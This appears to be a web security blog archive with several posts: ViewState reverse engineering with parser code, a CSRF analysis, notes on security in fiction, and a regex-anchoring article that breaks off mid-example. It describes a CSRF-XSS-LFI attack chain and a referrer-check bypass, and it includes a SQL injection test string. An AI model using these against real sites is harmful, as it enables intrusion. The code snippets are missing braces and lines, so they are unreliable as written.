The man in the fedora and overcoat, Mr. Ross, returns to the diner. He laments that the bus didn’t make it across the bridge. (“Kerplunk. Right into the river.”)

Dismayed, he sits down at the counter, cradling a cup of coffee in his left hand. The next instant, with marvelous understatement, he pulls a pack of cigarettes from his overcoat and extracts a cigarette – using a third hand to retrieve some matches.

We Martians (he explains) are looking for a nice remote, pleasant spot to start colonizing Earth.

Oh, but we’re not finished. Haley nods at Mr. Ross’ story. You see, the inhabitants of Venus thought the same thing. In fact, they’ve already intercepted and blocked the Ross’ Martian friends in order to establish a colony of their own. Haley smiles, pushing back his diner hat to reveal a third eye in his forehead.

That, my friends, is an advanced persistent threat!

  1. The server rings up their bills, charging one of them $1.40 for 14 cups of coffee. I’m not sure which is more astonishing – drinking 14 cups or paying 10 cents for each one. 

A Spirited Peek into ViewState, Part II

Our previous article started with an overview of the ViewState object. It showed some basic reverse engineering techniques to start deconstructing the contents embedded within the object. This article broaches the technical aspects of implementing a parser to automatically pull the ViewState apart.

We’ll start with a JavaScript example. The code implements a procedural design rather than an object-oriented one. Regardless of your design preference, JavaScript enables either method.

The ViewState must be decoded from Base64 into an array of bytes. We’ll take advantage of browsers’ native atob and btoa functions rather than re-implement the Base64 routines in JavaScript. Second, we’ll use the proposed [ArrayBuffer] data type in favor of JavaScript’s String or Array objects to store the unencoded ViewState. Using ArrayBuffer isn’t necessary, but it provides a more correct data type for dealing with 8-bit values.

Here’s a function to turn the Base64 ViewState into an array of bytes in preparation of parsing:

function analyzeViewState(input) {
    var inputLength = input.length;
    var rawViewState = atob(input);
    var rawViewStateLength = rawViewState.length;
    var vsBytes = new Uint8Array(ArrayBuffer(rawViewStateLength));

    for(i = 0; i < rawViewStateLength; ++i) {
        vsBytes[i] = rawViewState.charCodeAt(i);

    if(vsBytes[0] == 0xff & vsBytes[1] == 0x01) { // okay to continue, we recognize this version
        var i = 2;
        while(i < vsBytes.length) {
            i = parse(vsBytes, i);
    else {
        document.writeln("unknown format");

The parse function will basically be a large switch statement. It takes a ViewState buffer, the current position in the buffer to analyze (think of this as a cursor), and returns the next position. The skeleton looks like this:

function parse(bytes, pos) {
    switch(bytes[pos]) {
        case 0x64: // EMPTY
        default: // unknown byte
    return pos;

If you recall from the previous article, strings were the first complex object we ran into. But parsing a string also required knowing how to parse numbers. This is the function we’ll use to parse numeric values. The functional approach coded us into a bit of a corner because the return value needs to be an array that contains the decoded number as an unsigned integer and the next position to parse (we need to know the position in order to move the cursor along the buffer):

function parseUInteger(bytes, pos) {
    var n = parseInt(bytes[pos]) & 0x7f;

    if(parseInt(bytes[pos]) > 0x7f) {
        var m = (parseInt(bytes[pos]) & 0x7f) << 7;
        n += m;

        if(parseInt(bytes[pos]) > 0x7f) {
            var m = (parseInt(bytes[pos]) & 0x7f) << 14;
            n += m;


    return [n, pos];

With the numeric parser created we can update the switch statement in the parse function:

function parse(bytes, pos) {
    var r = [0, 0];
    switch(bytes[pos]) {
        case 0x02:
            r = parseUInteger(bytes, pos);
            pos = r[1];
            document.writeln("number: " + r[0]);

Next up is parsing strings. We know the format is 0x05, followed by the length, followed by the “length” number of bytes. Now add this to the switch statement:

switch(bytes[pos]) {
    case 0x05:
        r = parseUInteger(bytes, pos);
        var size = r[0];
        pos = r[1];
        var s = parseString(bytes, pos, size);
        pos += size;
        document.writeln("string (" + size + "): " +

The parseString function will handle the extraction of characters. Since we know the length of the string beforehand it’s unnecessary for parseStringto return the cursor’s next position:

function parseString(bytes, pos, size) {
    var s = new String("");

    for(var i = pos; i < pos + size; ++i) {
        s += String.fromCharCode(parseInt(bytes[i], 10));

    return s;

We’ll cover two more types of objects before moving on to an alternate parser. A common data type is the Pair. As you’ve likely guessed, this is an object that contains two objects. It could also be called a tuple that has two members. The Pair is easy to create. It also introduces recursion. Update the switch statement with this:

switch(bytes[pos]) {
    case 0x0f:
        pos = parse(bytes, pos); // member 1
        pos = parse(bytes, pos); // member 2

More containers quickly fall into place. Here’s another that, like strings, declares its size, but unlike strings may contain any kind of object:

switch(bytes[pos]) {
    case 0x16:
        r = parseUInteger(bytes, pos);
        var size = r[0];
        pos = r[1];
        document.writeln("array of objects (" + size + ")");
        for(var i = 0; i < size; ++i) {
            pos = parse(bytes, pos);

From here you should have an idea of how to expand the switch statement to cover more and more objects. You can use this page as a reference. JavaScript’s capabilities exceed the simple functional approach of these previous examples; it can handle far more robust methods and error handling. Instead of embellishing that code, let’s turn our text editor towards a different language: C++.

Diving into C++ requires us to start thinking about object-oriented solutions to the parser, or at least concepts like STL containers and iterators. You could very easily turn the previous JavaScript example into C++ code, but you’d really just be using a C++ compiler against plain C code rather than taking advantage of the language.

In fact, we’re going to take a giant leap into the Boost.Spirit library. The Spirit library provides a way to create powerful parsers using clear syntax. (Relatively clear despite one’s first impressions.) In Spirit parlance, our parser will be a grammar composed of rules. A rule will have attributes related to the data type is produces. Optionally, a rule may have an action that executes arbitrary code.

Enough delay. Let’s animate the skeleton of our new grammar. The magic of template meta-programming makes the following struct valid and versatile. Its why’s and wherefore’s may be inscrutable at the moment; however, the gist of the parser should be clear and, if you’ll forgive some exaltation, quite elegant in terms of C++:

template <typename Iterator> struct Grammar : boost::spirit::qi::grammar<Iterator> {
    Grammar() : Grammar::base_type(start) {
        using boost::spirit::qi::byte_;

        empty = byte_(0x64);
        object = empty | pair;
        pair = byte_(0x0f) >> object >> object;
        version = byte_(0xff) >> byte_(0x01);
        start = version // must start with recognized version
            >> +object; // contains one or more objects

    qi::rule<Iterator> empty, object, pair, start, version;

We haven’t put all the pieces together for a complete program. We’ll put some more flesh on the grammar before unleashing a compiler on it. One of the cool things about Spirit is that you can compose grammars from other grammars. Here’s how we’ll interpret strings. There’s another rule with yet another grammar we need to write, but the details are skipped. All it does it parse a number (see the JavaScript above) and expose the value as the attribute of the UInteger32 rule.1 The following example introduces two new concepts, local variables and actions:

template <typename Iterator> struct String : boost::spirit::qi::grammar<Iterator, qi::locals<unsigned> > {
    String() : String::base_type(start) {
        using boost::spirit::qi::byte_;
        using boost::spirit::qi::omit;
        using namespace boost::spirit::qi::labels;

        start = omit[ (byte_(0x05) | byte_(0x1e))
            >> length[ _a = _1 ] ]
            >> repeat(_a)[byte_] ;

    UInteger32<Iterator> length; qi::rule<Iterator, qi::locals<unsigned> > start;

The action associated with the length rule is in square brackets. (Not to be confused with the square brackets that are part of the repeat syntax.) Remember that length exposes a numeric attribute, specifically an unsigned integer. The attribute of a rule can be captured with the _1 placeholder. The local variable for this grammar is captured with _a. Local variables can be passed into, manipulated, and accessed by other rules in the grammar. In the previous example, the value of length is set to _a via simple assignment in the action. Next, the repeat parser takes the value of _a to build the “string” stored in the ViewState. The omit parser keeps the extraneous bytes out of the string.

Now we can put the String parser into the original grammar by adding two lines of code (highlighted in bold). That this step is so trivial speaks volumes about the extensibility of Spirit:

    object = empty | my_string | pair;
    start = version // must start with recognized version
        >> +object; // contains one or more objects

String<Iterator> my_string;
qi::rule<Iterator> empty, ...

The String grammar introduced the repeat parser. We’ll use that parser again in the grammar for interpreting ViewState containers. At this point the growth of the grammar accelerates quickly because we have good building blocks in place:

    using boost::spirit::qi::byte_;
    using boost::spirit::qi::repeat;

    container = byte_(0x16)
        >> length [ _a = _1 ]
        >> repeat(_a)[object] ;

    empty = byte_(0x64);

    object = empty | my_string | pair;

String<Iterator> my_string;
UInteger32<Iterator> length;
qi::rule<Iterator, qi::locals<unsigned> > container;
qi::rule<Iterator> empty, ...

This has been a whirlwind introduction to Spirit. If you got lost along the way, don’t worry. Try going through the examples in Spirit’s documentation. Then, re-read this article to see if the concepts make more sense. I’ll also make the sample code available to help get you started.

There will be a few surprises as you experiment with building Spirit grammars. For one, you’ll notice that compilation takes an unexpectedly long time for just a dozen or so lines of code. This is due to Spirit’s template-heavy techniques. While the duration contrasts with “normal” compile times for small programs, I find it a welcome trade-off considering the flexibility Spirit provides.

Another surprise will be error messages. Misplace a semi-colon or confuse an attribute and you’ll be greeted with lines and lines of error messages. Usually, the last message provides a hint of the problem. Experience is the best teacher here. I could go on about hints for reading error messages, but that would be an article on its own.

Between compile times and error messages, debugging rules might seem a daunting task. However, the creators of Spirit have your interests in mind. They’ve created two very useful aids to debugging: naming rules and the debug parser. The following example shows how these are applied to the String grammar. Once again, the change is easy to implement:

    start = omit[ (byte_(0x05) | byte_(0x1e))
        >> length[ _a = _1 ] ]
        >> repeat(_a)[byte_] ;
}; // Human readable name for the rule
debug(start); // Produce XML output of the parser’s activity

UInteger32<Iterator> length;
qi::rule<Iterator, qi::locals<unsigned> > start;

As a final resource, Boost.Spirit has its own web site with more examples, suggestions, and news on the development of this fantastic library.

It seems unfair to provide all of these code snippets without a complete code listing for reference or download. Plus, I suspect formatting restrictions may make it more difficult to read. Watch for updates to this article that provide both full code samples and more readable layout. Hopefully, there was enough information to get you started on creating your own parsers for ViewState or other objects.

In the next article in this series we’ll shift from parsing ViewState to attacking it and using it to carry our attacks past input validation filters into the belly of the web app.

  1. Spirit has pre-built parsers for many data types, including different types of integers. We need to use custom ones to deal with ViewState’s numeric serialization. 

A Spirited Peek into ViewState, Part I

The security pitfalls of the .NET ViewState object have been well-known since its introduction in 2002. The worst mistake is for a developer to treat the object as a black box that will be controlled by the web server and opaque to the end user. Before diving into ViewState security problems we need to explore its internals. This article digs into more technical language1 than others on this site and focuses on reverse engineering the ViewState. Subsequent articles will cover security. To invoke Bette Davis: “Fasten your seat belts. It’s going to be a bumpy night.”2

The ViewState enables developers to capture transient values of a page, form, or server variables within a hidden form field. The ability to track the “state of the view” (think model-view-controller) within a web page alleviates burdensome server-side state management for situations like re-populating fields during multi-step form submissions, or catching simple form entry errors before the server must get involved in their processing. (MSDN has several articles that explain this in more detail.)

This serialization of a page’s state involves objects like numbers, strings, arrays, and controls. These “objects” are not just conceptual. The serialization process encodes .NET objects (in the programming sense) into a sequence of bytes in order to take it out of the server’s memory, transfer it inside the web page, and reconstitute it when the browser submits the form.

Our venture into the belly of the ViewState starts with a blackbox perspective that doesn’t rely on any prior knowledge of the serialization process or content. The exploration doesn’t have to begin this way. You could write .NET introspection code or dive into ViewState-related areas of the Mono project for hints on unwrapping this object. I merely chose this approach as an intellectual challenge because the technique can be generalized to analyzing any unknown binary content.

The first step is trivial and obvious: decode from Base64. As we’re about to see, the ViewState contains bytes values forbidden from touching the network via an HTTP request. The data must be encoded with Base64 to ensure survival during the round trip from server to browser. If a command-line pydoc base64 or perldoc MIME::Base64 doesn’t help you get started, a simple web search will turn up several ways to decode from Base64. Here’s the beginning of an encoded ViewState:


Now we’ll break out the xxd command to examine the decoded ViewState. One of the easiest steps in reverse engineering is to look for strings because our brains evolved to pick out important words like “donut”, “Password”, and “zombies!” quickly. The following line shows the first 16 bytes that xxd produces from the previous example. To the right of the bytes xxd has written matching ASCII characters for printable values – in this case the string 720702894.

0000000: ff01 0f0f 0509 3732 3037 3032 3839 340f ......720702894.

Strings have a little more complexity than this example conveys. In an English-centric world words are nicely grouped into arrays of ASCII characters. This means that a programming language like C treats strings as a sequence of bytes followed by a NULL. In this way a program can figure out that the bytes 0x627261696e7300 represent a six-letter word by starting at the string’s declared beginning and stopping at the first NULL (0x00). I’m going to do some hand-waving about the nuances of characters, code points, character encodings and their affect on “strings” as I’ve just described. For the purpose of investigating ViewState we only need to know that strings are not (or are very rarely) NULL-terminated.

Take another look at the decoded example sequence. I’ve highlighted the bytes that correspond to our target string. As you can see, the byte following 720702894 is 0x0f – not a NULL. Plus, 0x0f appears twice before the string starts, which implies it has some other meaning:

ff01 0f0f 0509 **3732 3037 3032 3839 340f ......720702894.

The lack of a common terminator indicates that the ViewState serializer employs some other hint to distinguish a string from a number or other type of data. The most common device in data structures or protocols like this is a length delimiter. If we examine the byte before our visually detected string, we’ll see a value that coincidentally matches its length. Count the characters in 720702894.

ff01 0f0f 0509 3732 3037 3032 3839 340f ......720702894.

Congratulations to anyone who immediately wondered if ViewState strings are limited to 255 characters (the maximum value of a byte). ViewState numbers are a trickier beast to handle. It’s important to figure these out now because we’ll need to apply them to other containers like arrays.3 Here’s an example of numbers and their corresponding ViewState serialization. We need to examine them on the bit level to deduce the encoding scheme.

Decimal   Hex     Binary  
1         01      00000001  
9         09      00001001  
128       8001    10000000 00000001  
655321    09ffd9  11011001 11111111 0100111

The important hint is the transition from values below 128 to those above. Seven bits of each byte are used for the number. The high bit tells the parser, “Include the next byte as part of this numeric value.”

LSB           MSB  
10000110 00101011

Here’s the same number with the unused “high” bit removed and reordered with the most significant bits first.

MSB   ...   LSB  
0101011 0000110 (5510, 0x1586)

Now that we’ve figured out how to pick out strings and their length it’s time to start looking for ways to identify different objects. Since we have strings on the mind, let’s walk back along the ViewState to the byte before the length field. We see 0x05.

ff01 0f0f 0509 3732 3037 3032 3839 340f ......720702894.

That’s the first clue that 0x05 identifies a string. We confirm this by examining other suspected strings and walking the ViewState until we find a length byte (or bytes) preceded by the expected identifier. There’s a resounding correlation until we find a series of strings back-to-back that lack the 0x05 identifier. Suddenly, we’re faced with an unknown container. Oh dear. Look for the length field for the three strings:

0000000: 1503 0774 6f70 5f6e 6176 3f68 7474 703a ...top_nav?http:
0000010: 2f2f 7777 772e 5f5f 5f5f 5f5f 5f2e 636f //
0000020: 6d2f 4162 6f75 7455 732f 436f 6e74 6163 m/AboutUs/Contac
0000030: 7455 732f 7461 6269 642f 3634 392f 4465 tUs/tabid/649/De
0000040: 6661 756c 742e 6173 7078 0a43 6f6e 7461 fault.aspx.Conta
0000050: 6374 2055 73 ct Us

Moving to the first string in this list we see that the preceding byte, 0x03, is a number that luckily matches the amount of strings in our new, unknown object. We peek at the byte before the number and see 0x15. We’ll call this the identifier for a String Array.

At this point the reverse engineering process is easier if we switch from a completely black box approach to one that references MSDN documentation and output from other tools.

Two of the most common objects inside a ViewState are Pairs and Triplets. As the name implies, these containers (also called tuples) have two or three members. There’s a catch here, though: They may have empty members. Recall the analysis of numbers. We wondered how upper boundaries (values greater than 255) might be handled, but we didn’t consider the lower bound. How might empty containers be handled? Do they have a length of zero (0x00)? Without diverging too far off course, I’ll provide the hint that NULL strings are 0x658 and the number zero (0) is 0x66.

The root object of a ViewState is either a Pair or Triplet. Thus, it’s easy to inspect different samples in order to figure out that 0x0f identifies a Pair and 0x10 a Triple. Now we can descend the members to look for other kinds of objects.

A Pair has two members. This also implies that it doesn’t need a size identifier since there’s no point in encoding “2” for a container that is designed to hold two members. (Likewise “3” for Triplets.) Now examine the ViewState using a recursive descent parser. This basically means that we encounter a byte, update the parsing context based on what the byte signifies, then consume the next byte based on the current context. In practice, this means a sequence of bytes like the following example demonstrates nested Pairs:

0000000: ff01 0f0f 0509 3732 3037 3032 3839 340f ......720702894.
0000010: 6416 0666 0f16 021e 0454 6578 7405 793c d..f.....Text.y<
 - Member 1: Pair
    - Member 1: String
    - Member 2: Pair
       - Member 1: ArrayList (0x16) of 6 elements
           Number 0
       - Member 2: Empty
 - Member 2: Empty

Don’t worry if you finish parsing with 16 or 20 leftover bytes. These correspond to the MD5 or SHA1 hash of the contents. In short, this hash prevents tampering of ViewState data. Recall that the ViewState travels back and forth between the client and server. There are many reasons why the server wants to ensure the integrity of the ViewState data. We’ll explore integrity (hashing), confidentiality (encryption), and other security issues in a future article.

I haven’t hit every possible control object that might sneak into a ViewState. You can find a NULL-terminated string. You can find RGBA color definitions. And a lot more.

This was a brief introduction to the ViewState. It’s necessary to understand its basic structure and content before we dive into its security implications. In the next part of this series I’ll expand the analysis to more objects while showing how to use the powerful parsing available from the Boost.Spirit C++ library. We could even dive into JavaScript parsing for those who don’t want to leave the confines of the browser. After that, we’ll look at the security problems due to unexpected ViewState manipulation and the countermeasures for web apps to deploy. In the mean time, I’ll answer questions that pop up in the comments.

  1. More technical, but not rigorously so. Given the desire for brevity, some programming terms like objects, controls, NULL, strings, and numbers (integers signed or unsigned) are thrown about rather casually. 

  2. All About Eve. (Then treat yourself to Little Foxes and Whatever Happened to Baby Jane?

  3. I say “other containers” because strings can simply be considered a container of bytes, albeit bytes with a particular meaning and restrictions. 

CSRF and Beyond

Identifying CSRF vulnerabilities is more interesting than just scraping HTML for hidden fields or forging requests. CSRF stems from a design issue of HTTP and HTML that is in one aspect a positive feature of the web, but leads to unexpected consequences for web sites. We’ll start with a brief description of detection methods before diverging onto interesting(?!) tangents.

A passive detection method that is simple to automate looks for the presence or absence of CSRF tokens in web pages. This HTML scraping is prone to many errors and generates noisy results that don’t scale well for someone dealing with more than one web site at a time. This approach just assumes the identity of a token; it doesn’t verify that it is a valid one or more importantly that the application verifies it. Unless the page is examined after JavaScript has updated the DOM, this technique misses dynamically generated tokens, form fields, or forms.

An active detection method that can be automated replays requests under different user sessions. This approach follows the assumption that CSRF tokens are unique to a user’s session, such as the session cookie1 or other pseudo-random value. There’s also a secondary assumption that concurrent sessions are possible. To be effective, this approach requires a browser or good browser emulation to deal with any JavaScript and DOM updates. Basically, this technique swaps forms between two user sessions. If the submission succeeds, then it’s more likely request forgery is possible. If the submission fails, then it’s more likely a CSRF countermeasure has blocked it. There’s still potential for false negatives if some static state token or other form field wasn’t updated properly. The benefit of this approach is that it’s not necessary to guess the identity of a token and that the test is actually determining whether a request can be forged.

Once more countermeasures become based on the Origin header, the replay approach might be as as simple as setting an off-origin value for this header. A server will either reject or accept the request. This would be a nice, reliable detection (not to mention simple, strong countermeasure), but sadly not an imminent one.2

Almost by default, an HTML form is vulnerable to CSRF. (For the sake of word count forms will be synonymous with any “resource” like a link or XHR request.) WhiteHat Security described one way to narrow the scope of CSRF reporting from any form whatsoever to resources that fall into a particular category. Read the original post3, them come back. I’ve slightly modified WhiteHat’s three criteria to be resources:

  • with a security context or that cross a security boundary, such as password or profile management
  • that deliver an HTML injection (XSS) or HTTP response splitting payload to a vulnerable page on the target site. This answers the question for people who react to those vulns with, “That’s nice, but so what if you can only hack your own browser.” This seems more geared towards increasing the risk of a pre-existing vuln rather than qualifying it as a CSRF. We’ll come back to this one.
  • where sensitive actions are executed, such as anything involving money, updating a friend list, or sending a message

The interesting discussion starts with WhiteHat’s “benign” example. To summarize, imagine a site with a so-called non-obvious CSRF, one XSS vuln, one Local File Inclusion (LFI) vuln, and a CSRF-protected file upload form. The attack uses the non-obvious CSRF to exploit the XSS vuln, which in turn triggers the file upload to exploit the LFI. For example, the attacker creates the JavaScript necessary to upload a file and exploit the LFI, places this payload in an image tag on an unrelated domain, and waits for a victim to visit the booby-trapped page so their browser loads <img src=””>.

This attack was highlighted as a scenario where CSRF detection methods would usually produce false negatives because the vulnerable link,, doesn’t otherwise affect the user’s security context or perform a sensitive action.

Let’s review the three vulns:

  • Ability to forge a request to a resource, considered “non-obvious” because the resource doesn’t affect a security context or execute a sensitive action.
  • Presence of HTML injection, HTTP Response Splitting, or other clever code injection vulnerability in said resource.
  • Presence of Local File Inclusion.

Using XSS to upload a file isn’t a vulnerability. There’s nothing that says JavaScript within the Same Origin Rule (under which the XSS falls once it’s reflected) can’t use XHR to POST data to a file upload form. It also doesn’t matter if the file upload form has CSRF tokens because the code is executing under the Same Origin Rule and therefore has access the tokens.

I think these two recommendations would be made by all and accepted by the site developers as necessary:

  • Fix the XSS vulnerability using recommend practices (let’s just assume the arg variable is just reflected in
  • Fix the Local File Inclusion (by verifying file content, forcing MIME types, not making the file readable, not using PHP at all, etc.)

But it was CSRF that started us off on this attack scenario. This leads to the question of how the “non-obvious” CSRF should be reported, especially from an automation perspective:

  • Is a non-obvious CSRF vulnerability actually obvious if the resource has another vuln (e.g. XSS)? Does the CSRF become non-reportable once the other vuln has been fixed?
  • Should a non-obvious CSRF vulnerability be obvious anyway if it has a query string (or form fields, etc.) that might be vulnerable?

If you already believe CSRF should be on every page, then clearly you would have already marked the example vulnerable just by inspection because it didn’t have an explicit countermeasure. But what about those who don’t follow the absolutist proscription of CSRF everywhere? (For performance reasons, or the resource doesn’t affect the user’s state or security context.)

Think about pages that use “referrer” arguments. For example:

In addition to possibly being an open redirect, these are prime targets for XSS with payloads like

It seems that in these cases the presence of CSRF just serves to increase the XSS risk rather than be a vuln on its own. Otherwise, you risk producing too much noise by calling any resource with a query string vulnerable. In this case CSRF provides a rejoinder to the comment, “That’s a nice reflected XSS, but you can only hack yourself with it. So what.” Without the XSS vuln you probably wouldn’t waste time protecting that particular resource.

Look at a few of the other WhiteHat examples. They clearly fall into CSRF (changing shipping address, password set/reset mechanisms) with no doubt successful exploits could be demonstrated.

What’s interesting is that they seem to require race conditions or to happen during specific workflows to be successful4, e.g. execute the CSRF so the shipping address is changed before the transaction is completed. That neither detracts from the impact nor obviates it as a vulnerability. Instead, it highlights a more subtle aspect of web security: state management.

Let’s set aside malicious attackers and consider a beneficent CSRF donor. Our scenario begins with an ecommerce site. The victim, a lucky recipient in this case, has selected an item and placed it into a virtual shopping cart.

1) The victim (lucky recipient!) fills out a shipping destination.

2) The attacker (benefactor!) uses a CSRF attack to apply a discount coupon.

3) The recipient supplies a credit card number.

4) Maybe the web site is really bad and the benefactor knows that the same coupon can be applied twice. A second CSRF applies another discount.

5) The recipient completes the transaction.

6) Our unknown benefactor looks for the new victim of this CSRF attack.

I chose this Robin Hood-esque scenario to take your attention away from the malicious attacker/victim formula of CSRF to focus on the abuse of workflows.

A CSRF countermeasure would have prevented the discount coupon from being applied to the transaction, but that wouldn’t fully address the underlying issues here. Consider the state management for this transaction.

One problem is that the coupon can be applied multiple times. During a normal workflow the site’s UI leads the user through a check-out sequence that must be followed. On the other hand, if the site only prevented users from revisiting the coupon step in the UI, then the site’s developers have forgotten how trivial it is to replay GET and POST requests. This is an example of a state management issue where an action that should be performed only once can be executed multiple times.

A less obvious problem of state management is the order in which the actions were performed. The user submitted a discount coupon in two different steps: right after the shipping destination and right after providing payment info. In the UI, let’s assume the option to apply a discount shows up only after the user provides payment information. A strict adherence to this transaction’s state management should have rejected the first discount coupon since it arrived out of order.

Sadly, we have to interrupt this thought to address real-world challenges of web apps. I’ve defined a strict workflow as (1) shipping address required, (2) payment info required, (3) discount coupon optional, (4) confirm transaction required. A site’s UI design influences how strict these steps will be enforced. For example, the checkout process might be a single page that updates with XHR calls as the user fills out each section in any order. Conversely, this single page checkout might enable each step as the user completes them in order.

UI enforcement cannot guarantee that requests be made in order. This is where decisions have to be made regarding how strictly the sequence is to be enforced. It’s relatively easy to have a server-side state object track these steps and only update itself for requests in the correct order. The challenge is keeping the state flexible enough to deal with users who abandon a shopping cart, or decide at the last minute to add an extra widget before confirming the transaction, or a multitude of other actions that affect the state. These aren’t insurmountable challenges, but they induce complexity and require careful testing. This trade-off between coarse state management and granular control leads more to a balance of software correctness rather than security. You can still have a secure site if steps can be performed in order of 3, 1, 2, 4 rather than the expected 1, 2, 3, 4.

CSRF is about requests made in the victim’s session context (by the victim’s browser) on behalf of the attacker (initiated from an unrelated domain) without the victim’s interaction. If a link, iframe, image tag, JavaScript, etc. causes the victim’s browser to make a request that affects that user’s state in another web site, then the CSRF attack succeeded. The conceptual way to fix CSRF is to identify forged requests and reject them. CSRF tokens are intended to identify legitimate requests because they’re a shared secret between the site and the user’s browser. An attacker who doesn’t know the secret can forge a legitimate request.

What this discussion of CSRF attacks has highlighted is the soft underbelly of web sites’ state management mechanisms.

Automated scanners should excel at scaleability and consistent accuracy, but woe to those who believe they fully replace manual testing. Scanners find implementation errors (forgetting to use a prepared statement for a SQL query, not filtering angle brackets, etc.), but they don’t have the capacity to understand fundamental design flaws. Nor should they be expected to. Complex interactions are best understood and analyzed by manual testing. CSRF stands astride the gap between automation and manual testing. Automation identifies whether a site accepts forged requests, whereas manual testing can delve deeper into underlying state vulnerabilities or chains of exploits that CSRF might enable.

  1. Counter to recommendations that session cookies have the Http-Only attribute so their value is not accessible via JavaScript. Http-Only is intended to mitigate some XSS exploits. However, the presence of XSS basically negates any CSRF countermeasure since the XSS payload can perform requests in the Same Origin without having to resort to forged, off-origin requests. 

  2. A chicken-and-egg problem since there needs to be enough adoption of browsers that include the Origin header for such a countermeasure to be useful without rejecting legitimate users. Although such rejection would be excellent motivation for users to update old, likely insecure, and definitely less secure browsers. 


  4. These particular attacks are significantly easier on unencrypted Wi-Fi networks with sites that don’t use HTTPS, but in that case there are a lot of different attacks. Plus, the basis of CSRF tokens is that they are confidential to the user’s browser – not the case when sniffing HTTP. 

Electric Skillet

Of John Brunner’s novels, I recommend reading Stand on Zanzibar first; it’s a well-known classic. Follow that with The Sheep Look Up. If you’re interested in novelty, Squares of the City has the peculiar attribute of being written to the rules of a chess game (the book’s appendix maps each character’s role to its relevant piece).

Two of Brunner’s books contain computer security concepts and activities. The first one, Shockwave Rider, was written in 1975 and is largely responsible for generating the concept of a worm. A character, Sandy, explains:

What you need is a worm with a completely different structure. The type they call a replicating phage.

The character continues with a short history of replicating phages, including one developed at a facility called Electric Skillet:

…and its function is to shut the net down and prevent it being exploited by a conquering army. They think the job would be complete in thirty seconds.

The main character, Nick Halflinger, creates a variant of the self-replicating phage. Instead of devouring its way towards to the destruction of the net, the program grows off data as a virtual parthenogenetic tapeworm. Nick is a smart computer sabotage consultant (among other things); his creation “won’t expand to indefinite size and clog the net for other use. It has built-in limits.” No spoilers, but the tapeworm has a very specific purpose.

In this 1988 novel, Children of the Thunder, Brunner mentions a logic bomb as he introduces a freelance writer who had been covering a computer security conference. Brunner didn’t coin this term, though. Malicious insiders were creating logic bombs at least since 19851, famously described by a computer scientist in 1984, and known in the late 70s 2 (including a U.S. law covering cybercrime in 1979).

The history of the term is almost beside the point because the whimsical nature of the fictional version deserves note 3:

Two months ago a logic bomb had burst in a computer at British Gas, planted, no doubt, by an employee disgruntled about the performance of his or her shares, which resulted in each of its customers in the London area being sent the bill intended for the next person on the list – whereupon all record of the sums due had been erased.

A paragraph later we’re treated to a sly commentary embedded in the description of the newspaper who hired the journalist:

The paper…was in effect a news digest, aimed at people with intellectual pretensions but whose attention span was conditioned by the brevity of radio and TV bulletins, and what the [editor] wanted was a string of sensational snippets about his readers’ privacy being infringed, bent programmers blackmailing famous corporations, saboteurs worming their way into GCHQ and the Ministry of Defense…”

The fictional newspaper is called the Comet, but it sounds like an ancestor to El Reg (with the addition of pervasive typos and suggestive puns). It’s amusing to see commentary on the attenuation of attention spans due to radio and TV in 1988. It provides a multi-decade precursor to contemporary screeds against Twitter, texting, and Facebook.

Should you have attention left to continue reading, I encourage you to try one or more of these books.

  1. “Man Guilty in ‘Logic Bomb’ Case.” Los Angeles Times 4 July 1985, Southland ed., Metro; 2; Metro Desk sec.: 3. “[Dennis Lee Williams], who could face up to three years in prison when sentenced by Los Angeles Superior Court Judge Kathleen Parker on July 31, was convicted of setting up the program designed to shut down important data files.” 

  2.  Communications of the ACM: Volume 22. 1979. “…logic bomb (programmed functions triggered to execute upon occurrence of future events)…” 

  3.  Brunner, John. Children of the Thunder. New York: Ballantine, 1989. 8-9. 

Carborundum Saw

It’s entertaining to come across references to computer security in fiction. Sometimes the reference may be grating, infused with hyperbole or laughably flawed. Sometimes it may seem surprisingly prescient, falling somewhere along a spectrum of precision and detail.

Even more rewarding is to encounter such a quote within a good book. Few readers who venture outside of modern bestsellers, science-fiction or otherwise, may recognize the author Stanisław Lem, but they may be familiar with the movie based on his book of the same name: Solaris. Lem has written several books, two of my favorites being The Cyberiad and Fiasco.

One Human Minute, from 1986, isn’t about computers in particular. The story is presented as a book review of an imagined tome that describes one minute of the entire Earth’s population. It also has this fun gem:

Meanwhile, computer crime has moved from fantasy into reality. A bank can indeed be robbed by remote control, with electronic impulses that break or fool security codes, much as a safecracker uses a skeleton key, crowbar, or carborundum saw. Presumably, banks suffer serious losses in this way, but here One Human Minute is silent, because – again, presumably – the world of High Finance does not want to make such losses public, fearing to expose this new Achille’s heel: the electronic sabotage of automated bookkeeping.1

Carborundum saw would also make a great name for a hacking tool.

  1. Lem, Stanisław. One Human Minute. Trans. Catherine S. Leach. San Diego: Harvest Book, 1986. 34. 

Regex-based security filters sink without anchors


In June 2010 the Stanford Web Security Research Group released a study of clickjacking countermeasures employed across Alexa Top-500 web sites. It’s an excellent survey of different approaches taken by web developers to prevent their sites from being subsumed by an iframe tag.

One interesting point emphasized in the paper is how easily regular expressions can be misused or misunderstood as security filters. Regexes can be used to create positive or negative security models – either match acceptable content (allow listing) or match attack patterns (deny listing). Inadequate regexes lead to more vulnerabilities than just clickjacking.

One of the biggest mistakes made in regex patterns is leaving them unanchored. Anchors determine the span of a pattern’s match against an input string. The ^ anchor matches the beginning of a line. The $ anchor matches the end of a line. (Just to confuse the situation, when ^ appears inside grouping brackets it indicates negation, e.g. [^a]+ means match one or more characters that is not a.)

Consider the example of the’s document.referrer check as shown in Section 3.5 of the Stanford paper. The weak regex is highlighted below:

if(window.self != &&
   !document.referrer.match(/https?:\/\/[^?\/]+\.nytimes\.com\//)) {

As the study’s authors point out (and anyone who is using regexes as part of a security or input validation filter should know), the pattern is unanchored and therefore easily bypassed. The site developers intended to check the referrer for links like these:

Since the pattern isn’t anchored, it will look through the entire input string for a match, which leaves the attacker with a simple bypass technique. In the following example, the pattern matches the text in red – clearly not the developers’ intent:


The devs wanted to match a URI whose domain included “”, but the pattern would match anywhere within the referrer string.

The regex would be improved by requiring the pattern to begin at the first character of the input string. The new, anchored pattern would look more like this:


The same concept applies to input validation for form fields and URI parameters. Imagine a web developer, we’ll call him Wilberforce for alliterative purposes, who wishes to validate U.S. zip codes submitted in credit card forms. The simplest pattern would check for five digits, using any of these approaches:

[0-9]{5} \d{5} [[:digit:]]{5}

At first glance the pattern works. Wilberforce even tests some basic XSS and SQL injection attacks with nefarious payloads like and 'OR 19=19. The regex rejects them all.

Then our attacker, let’s call her Agatha, happens to come by the site. She’s a little savvier and, whether or not she knows exactly what the validation pattern looks like, tries a few malicious zip codes (the five digits are underlined):

